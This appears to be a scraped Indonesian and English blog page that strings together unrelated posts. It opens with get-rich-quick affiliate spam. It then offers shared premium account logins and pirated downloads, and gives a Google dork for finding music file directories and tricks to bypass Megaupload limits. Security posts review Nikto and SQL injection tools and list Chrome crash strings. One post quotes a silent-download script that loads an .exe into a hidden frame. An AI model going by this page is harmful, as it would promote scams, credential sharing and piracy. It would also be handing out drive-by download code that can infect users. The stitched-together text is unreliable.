EASY WAY TO MAKE MONEY!!!!

Payout Per Sale! Over 3 Years Running, The Original And Best-Selling World Of Warcraft Gold Guide Is Now The Highest Paying WoW Guide. Superb Conversions With New Sales Page. Affiliates Make Hundreds Per Day- Do You Want To?
CLICK HERE


Take Surveys and Get Paid
Make Extra Money Working From Home
It's Fun, It's Easy $75/Survey
CLICK HERE



Seo Elite: New Seo Software! The Grand Daddy Of All Seo Software! Get A Top 5 Google Ranking In Under 30 Days! $101 Affiliate Payout!
CLICK HERE

Forex Autopilot - Robots Trading The Forex Market. Follow Up To The Smash Hit Forex Killer The Best Selling Forex Software Online With The Highest Gravity. This Is Brand New!
CLICK HERE


Simply The Best Forex Course On CB. Do You Want To Dramatically Increase Your Affiliate Commission? Try Forex Avenger!
CLICK HERE


Forex Funnel - Untouchable! You Earn Over $81/Conversion!!!!!!!!!!
CLICK HERE


Automated Cash Formula. Fast & Easy Secret Money Making System - Without Using A Website Or Marketing. Paying Top 75% Commissions On Two Levels! Get Affiliate Tools Here:
CLICK HERE



Get Google Ads Free! :: New Secret!! :: Newbie Affiliate Made $109,620. In Just 1st 60 Days! :: Proof Of How Powerful At Affiliate Page! :: Makes $40-$67 Per Sale! :: 75% Payouts Guaranteed! :: Contains *Magic Code* When Added To Any Site Makes Google Pay-Per-Click Ads Costs Go To Zero! :: See CB Ad At Right For Proof!
CLICK HERE


Get 75%! ::: $31.85 Front & $45.73 Back! ::: Top Secret Magic Code :::. Add Just 1 Simple String Of Code To Any Website Money Magically Starts Pouring Into Your Pocket! ::: Takes Just 45 Sec To Add! ::: Best-Seller In Big Demand! ::: Every Website Owner Demands This New Magic Code
CLICK HERE


EASY WAY TO MAKE MONEY ONLINE!!!!

Who Wants To Make up to $1000+ Per Day Just Entering Simple Data From Home?

data entry bank

What if I told you that you can quit your current job, work from home entering simple data online, and then make more money than you ever could - would you believe me?

What if I told you that you could work as little as 15 - 30 minutes a day?

Do you think it’s possible for someone with no special skills to make $250+ in just a few hours typing short sentences on a home computer?

The answer is: Absolutely. Positively. YES. And I know, because real everyday people like you and me are already making good money from home, using a system that I've discovered which I call the "Data Entry Bank Program".

click here for more

data entry bank

pasang iklan gratiss!!!

mau pasang iklan gratis???
banyak situs pemasangan iklan online yg gratis atau berbayar, tp pasang iklan di iklanbarisgratis beda, disini kita dibayar setiap pasang iklan 'n pendaftarannya jg gratis!

lumayan lah bwt nambah uang jajan :D
category iklannya jg banyak, ampir lengkap malah..... bwt yg mo pasang iklan atau cari barang juga bisa disini.... mo liat?? langsung ke TKP

click aja di http://iklanbarisgratis.info

ebook paketdownload

holaa......
mau bagi² link lg neh

tau kan site² yg ngejual ebook² kaya formulajitu, uangpanas, dll?
kl diliat sekilas dr tulisan ketikan sang pembuat ebook emang menarik
tp apa kalian tau apa isi ebook nya? buat netters biasa memang ebooknya sangat cukup berguna

tp apa kata orang² yg dijuluki setan internet??
ebook² yg dijual gak lebih dari SAMPAH

mereka cm googling trik² lama 'n trik lama itu dibikin ebook bwt dijual lg

tools² 'n script² yg dijadiin bonus jg udah basi. . . . . . . . . . . .
bahkan ada yg gratisan 'n ga berguna tp dibuat kaya sangat bermanfaat

kl gak percaya ini contoh ebook² dr situs paketdownload yg bisa kalian download secara GRATIS!!!
click di setiap nomer

1

2

3

4

5

bbrp file pdf nya dipassword, passwordnya bisa didownload di bawah ini

PASSWORD

lumayan kan ngehemat duit, drpd beli mahal²


ok. . . . . . . . dah dl ya. .
sorry gak bisa post banyak² dl, lg gak enak badan akhir² ini

cari database lagu di google

caranya gampang....
1. buka browser kesayangan (IE, opera, FF, chrome, safari, dll)
2. masuk ke http://www.google.com
3. pastiin dah tau judul lagu atau penyanyinya
4. masukin tag ini di keyword

-inurl:(htm|html|php) intitle:"index of" +"last modified" +"parent directory" +description +size +(.mp3|.wma) "judul/penyanyi"

nah yg warna putih itu diganti ma penyanyi atau judul lagu yg lo cari! gampang kan ^^v

PREMIUM ACCOUNT!!!

alowwww......
berhubung ga tau mo post apa lagi, jadi gw kasih premium account aja ya

buat yg mau bebas pake, cm tolong jangan diganti passwordnya!!!!

premium account nya ada puluhan, tapi jangan serakah ya.........
lumayan lah bwt download² software full version

tadinya mo dari kemaren post, tp berhubung ga enak badan jadi di undur deh

ya dah........ langsung ke TKP!!!

click buat download ID nya
MEGASHARE

unlimitedgamedownloads

PIRATEACCESS

GAMESPOT

CAMPUR² 1

CAMPUR² 2

CAMPUR² 3

DAN. . . . . . . . . . . . . . . .

untuk para bokep mania!!!!!!!

DOWNLOAD DISINI


THX ya bwt tmn² yg dah download...... sangat membantu


bwt yg ID bokep masih ada lagi, tp menyusul ya.... pusing banyak yg PM nich

Penetration testing tools - Nikto

Nikto is a web server security assessment tool. It is designed to find various default and insecure files, configurations and programs on any type of web server. Definately one of the most preferred free web app scanners available.

After a small vacation I'm back on the series of the best tools for web application penetration testers. Last time we gave a look at dirbuster in the category of information gathering. It was hard to pick one among all the nice tools around to fuzz and discover hidden parts of a web site.

Another similar tool I like is wfuzz, that works both through dictionary and brute force.

But this time I'm going to talk about nikto as it is one of the most known and used web application security scanners.

Quoting from the author's website

Nikto checks for 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers.

A good thing is that nikto database of vulnerabilities can be updated easily from the command line (it's a command line tool written in perl btw).

Nikto is especially good once we have discovered what's running on the target web server and we want to know what's vulnerable.

Nikto is not meant as an attacking tool. It is more a vulnerability assessment tool that tries known exploits against the target to trigger known behaviours. When this happens it is reported to the user.
Nikto is not only useful in case the target has some off the shelf code known to be vulnerable to some publicly available exploit. But also helps at discovering known web server misconfigurations.

First useful thing that Nikto does when launched against a web site is to fingerprint the web server version.
Then tries all the signature database against the website according to the enabled tests (all by default).
This causes a big "noise" in the website log as it doesn't seem to narrow down the type of attacks according to the type of software found on the webserver, but this shouldn't be a problem for an authorized penetration testing job.
Joomla is a nice example: Nikto tries all the known exploits against joomla components even if these components are not installed on the Joomla distro it is assessing.
So 90% of the trials are non-sense while a more intelligent way to do it would have been to recognize what is installed and then try the exploits accordingly. But yeah, nikto is open source and anyone can adjust its functioning.

Nikto provides a good degree of flexibility by allowing the pen tester to tune the scan enabling only certain kinds of vulnerabilities to be tested such as Misconfiguration/default files, Information disclosure, Interesting file/seen in logs etc.

These can be enabled/disabled easily using the -Tuning switch followed by the reference number you can find in the nikto manual in the package.

This is an example that will trigger the tests of Remote File Retrieval and Command execution only:

perl nikto.pl -h 192.168.0.1 -T 58

with the "x" we exclude the two and enable all the rest:

perl nikto.pl -h 192.168.0.1 -T 58x

My favourite test is the number 1 : "Interesting File / Seen in logs" , it sometimes shows interesting stuff that can be very helpful for the whole penetration testing endeavours.

As a last note, false positive is probably the only problem affecting nikto. It sometimes reports completely meaninlgess threats so manual verification must be taken to validate the scan results.

DNS cache poisoning, first attacks

From this (funny) video, I have found on Kaminsky blog (the guy who gave new life to the old DNS cache poisoning issue) seems that large part of the major ISP's DNS servers have been patched.

After Kaminsky's publication of the vulnerability exploit code gone wild and ported to HD Moore's Metasploit framework just few days late.

Not even 2 weeks after the breakthrough, HD Moore's company web site has been hijacked by spammers poisonoing At&T DNS Server serving his company's website. Hilarious, but sh*t happens. Above all when it's not up to you or under your control.

Yesterday, Black Hat day 1, Kaminsky gave more details on the patching status of the main ISP's and all the unpublished details about the attack.
It's only a matter of patching now, since everything is public.

The best SQL Injection tools classified

Priamos

• Works on SQL server only

• Enumerates databases, tables and data in a very nice GUI

• The only big problem is that it works only with GET requests, unless you make it pass through a proxy to change the request to POST and shift the query string to the http request payload.

• Allows for proxy tunneling

• Very fast

Absinthe
Beside some bugs that affect the tool, 2.0b version works with

• Blind sqli
• Error based sqli

and does a better job than 1.41 version.

Blind mode supports: SQL Server, Postgre, Sybase, Oracle.
Error based mode supports SQL Server

• good GUI from which fine tuning the injection parameters and additional options like authentication.

Injection is feasible through

• POST
• GET
• COOKIE

Allows for proxy tunneling

SQLMap
It's the best tool to deal with Mysql sql injections. The only tool that does the job sometimes.

• It's python powered so it's cross platform.

It supports:

• MySQL
• Oracle
• PostgreSQL
• Microsoft SQL Server.

SQLmap supports two operating modes:

• Blind SQLi
• Inband (Union) Sqli

Before going for Blind sql injection, that is slow and requires a lot of requests to the server, it is possible to check for UNION based sqli availability that gives faster results.

SQLmap performs blind sqli recognition through hashes of the http response text. It is possible to specify the string to match in the response text when the case is TRUE. A very needed feature sometimes.

It supports injection into

• GET
• POST
• COOKIE
• USER-AGENT

and retrieves:

• databases username and password
• DBMS version
• databases
• tables
• data

It allows to execute custom SQL queries as if you were on a real SQL client connected to the remote DBMS. This saves a lot of time and allows for very sophisticated data retrieval.

More options are:

• proxy support
• google dorks
• remote file retrieval.

In the tool package a very nice guide on the tool usage is given

Automagic
It's written in perl and requires that you read the guide or watch the nice flash video before you can really enjoy it.

It works only against SQL Server DBMS and performs dumo of

• database
• tables
• data

It is possible to retrieve DBMS users and passwords. It's quite fast, in my opinion Priamos and Absinthe do a better job.
A good backup tool though.

To sum up

Mysql SQL Injection tools:

• SQL Map (blind and inband)

Oracle SQL Injection tools:

• SQL Map (inband)

• Absinthe (blind)

Sybase SQL Injection tools:

• Absinthe (blind)

MS SQL Server SQL Injection tools:

• Atomagic (error)

• SQL Map (error and inband)

• Priamos (error)

• Absinthe (error)

If the list is not exhaustive...well...these at least are the most known and used.
Of course every professional has his own tools and patches to improve these tools or adding functionalities. Your own tool is always the best tool.
Any suggestion or addition is encouraged!

Google Chrome vulnerabilities list

Ok, news is old, Google has released a new browser and all the web is blogging about it. But my duties are to talk about security so I'm not going to review Google Chrome's features but to list the vulnerabilities already found after only 16 hours from the release. (I fear this post will be outdated in few hours)

Rishi Narang has been the first. A Denial Of Service simple as pie:

Just browse this page and place your mouse over this link (make sure you bookmark this page if you want to read on though):

CRASH ME

Just "evil:%" in the anchor text is capable of crashing all the Chrome tabs (despite all the tabs are separated processes).

Someone has also reported that by entering a very long bookmark may kill the browser. Length has not been given but it's worth a try.

If your Chrome is still alive you may want to try entering

about@:

in the location bar.

Good thing is that the browser doesn't need Administrator rights to run.

Matt Cutt from his blog has stated that the chapter 11 of Eula will be updated. Yes the chapter about you giving all the rights to Google:

a perpetual, irrevocable, worldwide, royalty-free, and non-exclusive license to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content which you submit, post or display on or through, the Services.

I'm worried about the enthusiastic reviews I see online.
Google brand was enough to push an unfinished product up to make it 1% of the User-Agent's used on its very first day.
The risk is high, fuzzers are still crunching...

Google Chrome Silent File Download Exploit

This is what appeared few minutes ago on milw0rm and packetstorm:


< $cript > document.write('< src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); < / $cript >

This script should (I haven't tested it yet, will do it later) trigger a silent download on the client machine.

Today Hackers Center stats showed 13% of visitors using the new raw browser.
This is temporary peak, but still scary considering all the bugs found in less than 48 hours.

I think Google will soon regret about this too-soon release

Open Source CMS Award 2008

Packt publishing telah mengumumkan finalis setiap kategori untuk Open Source Cms Award 2008, tahun sebelumnya Drupal diumumkan sebagai pemenang award 2006, sedangkan joomla berada di posisi kedua.
Tahun ini keduanya masuk sebagai finalis dalam kategori yang berbeda, namun banyak sekali pesaing yang dapat merubah hasil akhir nanti.
Berikut adalah finalis untuk berbagai kategori :

Overall Open Source CMS Award Finalists :

1. DotNetNuke
2. Drupal
3. Joomla!
4. Plone
5. TYPOlight

Most Promising Open Source CMS Finalists :

1. CMS Made Simple
2. ImpressCMS
3. MiaCMS
4. MemHT
5. SilverStripe

Best PHP Open Source CMS Finalists :

1. CMS Made Simple
2. Drupal
3. eZ Publish
4. Joomla!
5. XOOPS

Best Other Open Source CMS Finalists :

1. dotCMS
2. DotNetNuke
3. mojoPortal
4. Plone
5. Umbraco

Di tahun 2008 ini award terdapat penambahan satu kategori untuk open source cms. Yakni Open Source CMS MVP Award, diambil dari kontribusi cms yang dibuat oleh perseorangan.
Info selengkapnya ... http://www.cmswire.com/cms/web-cms/the-08-open-source-cms-awards-finalists-are-in-003081.php

Paris Hilton's mobile got hacked

gulli submits: Paris Hilton just upset a lot of her friends.
Eminem, Lindsay Lohan, Christina Aguilera, Vin Diesel and Anna Kournikova (just to name a few) need to change their private phone numbers as they got after Paris' Sidekick-Account at T-Mobile got hacked. Not only her contact data but also some very private photographs and her mobile notes ("Check from rick" "Get birth control kill pill" are some of the highlights) got published as the Sidekick stores all this data in a webbased interface the hacker gained access to by guessing the right password.

AMD demos 4x4

Criticalmass writes: AMD's upcoming 4x4 gaming platform will cost "substantially" under $1,000 - for the processors at least. So said company VP Pat Moorhead, who showed off a prototype system in the US, though details of the system were kept under wraps.

AMD announced 4x4 last month. It's essentially a two-CPU motherboard rigged for ATI's CrossFire and Nvidia's SLI dual-GPU technology twice over to support four GPUs. Each CPU slot will hold a dual-core Athlon 64 FX processor, so that's four cores. Each chip gets 2GB of dedicated memory, for a total of 4GB. '4x4' is a codename, AMD insists.


The processor company has said it will push the 4x4 platform this coming Christmas. Moorhead said the platform would not be "limited" to hardcore gamers - presumably AMD will promote it to professional content creators too.

Indeed, there's nothing here that no quad-core system will be able to deliver - or, since AMD said this will be possible in due course - and octo-core rig either. AMD's quad-core CPUs will slot into a 4x4 board in place of the two dualies. The big benefit AMD stressed was the system's dual memory buses, one per processor, so there's no logjam at the memory controller as there might be with another chip maker's architecture.

AMD pitched the system as a way to run multiple, processor-hungry apps without degrading the performance of any one of them.

Megaupload bypass any download limit hack - Tutorial

MegaUpload is one of the most popular One-Click Webhosting and free file hosting that allows users to upload and store files up to 250 MB in size (up to 5 GB for premium users, although you can upload unlimited number of files) and share with others. Unfortunately, if you want to download contents and files from MegaUpload file hosting service for free, there are some limitations that applied to regular users, and one of them is download slots limit based on your country. The download slots available is depends on country, and if it’s used up, you have to wait for a download to finish and vacant the slot for you to be able to download again.

Ever wanted to download files from megaupload without installing the Megaupload Toolbar. Using this small trick you can bypass the country slot limitations & the Toolbar install pages.

Internet Explorer UserAgent

1. Start > Run > Type in regedit
2. Navigate to
Quote:
HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Internet Settings > 5.0 > User Agent > Post Platform
3. Right click on the right pane & Select New > String Value . Name it as
Quote:
MEGAUPLOAD 1.0
4. Close regedit & Enjoy!


FireFox Alexa Toolbar User Agent Hack for MegaUpload

Well, here’s a 100% functonable trick for Megaupload users who use Firefox

1. Go to the address bar and type: about:config
2. Look for this command: general.useragent.extra.firefox
3. Double click it…
4. Replace the text with this one: Firefox/2.0 MEGAUPLOAD 1.0
5. Press OK…
6. As easy as that! Now you can download without any limits… and it works whenever Megaupload tells you there are no slots available for your country!

These hacks work by faking megaupload that user has installed Megaupload Toolbar or Alexia Toolbar, since Megaupload use useragent to check if user has installed the toolbar or not

EDIT

Added three more solutions

To hack the MegaUpload download slots limit by country so that you can bypass the download slots limit, anonymous surfing or referrer blocker service can help:

If MegaUpload download link is http://www.megaupload.com/?XXXXXXX

Then replace the URL to the following format:

http://anonym.to/?http://www.megaupload.com/?XXXXXXX

Alternatively, use any anonymous surfing service such as Anonymouse or Guardster free web proxy to bypass the MegaUpload download limit. Steps to use Guardster to bypass MegaUpload Country limit are:

1. Go to the following site: http://www.guardster.com/subscription/proxy_free.php
2. Input the MegaUpload download link in the Address text box. (where you will see http:// in the box)
3. Uncheck (Unselect) all the options, like No Cookies, No Scripts, No Images, Hide Referrer, Hide User Agent, Hide Title, Hide Header.
4. Click on the button “I agree an wish to surf anonymously”.

Another workaround for MegaUpload slots limit is by using Google Language Tool translation capability.

1. Go to Google Language Tool, and scroll to Translate section. Or you can go direct to Google Translate.
2. Input MegaUpload download link into the tex box (where you can see http://) below the “Translate a web page:”.
3. For “from” option, the default (depending on your Google interface) English to German will do the trick, although other options will likely to allow the hack too.
4. Click on the “Translate” after the language option, and wait for the MegaUpload download page to load, which allows you to start download immediately without the limitation by download limit per country.

recovery

pernah gak ngalamin data ilang gara2 kehapus/keformat ulang/dan lain sebagainya?? kl pernah pst BT donk

sedikit cerita neh.... dulu waktu di kereta dr bandung ke jakarta gw ketemu 1 orang yg ngakunya bisa recovery segala macam harddisk, begitu gw tanya² dia jual software bwt recovernya itu seharga 2 jt! gw pikir mahal bgt tu software.... begitu nyampe di jkt gw coba googling bwt nyari software² recovery gt dan ternyata dapet dengan mudahnya

trs gw coba² ternyata gak semua nya berhasil, akhirnya setelah mencoba sekian banyak software, gw dapet yg paling cocok bwt dibawa² pk flash disk kesayangan, namanya PORTABLE_DATA_RECOVERY_PRO_FULL

gw coba recover flash disk gw sendiri dan ternyata data² gw dah lama gw hapus masih bisa di ambil lg! huhuuhuhu...... berhubung portable jadi gak perlu diinstal deh, praktisssss....!!!

cara pakenya gampang lg, tinggal click2 doank trs nunggu deh xixixixix....... o ya gak cm itu loh, pernah ada kejadian flash disk tmn gw data²nya ilang gara2 pake folder lock yg dipindahin ke flash disk 'n dia minta tolong bwt ngembaliin data²nya itu ke gw

ya dah gw coba aja 'n ternyata berhasil dengan tingkat perserntasi data yg kembali 75%

bwt download softwarenya click disini

hacker manifesto

Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...

Damn kids. They're all alike.

But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?

I am a hacker, enter my world...

Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...

Damn underachiever. They're all alike.

I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."

Damn kid. Probably copied it. They're all alike.

I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me.. Or thinks I'm a smart ass.. Or doesn't like teaching and shouldn't be here...

Damn kid. All he does is play games. They're all alike.

And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...

Damn kid. Tying up the phone line again. They're all alike...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.

This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.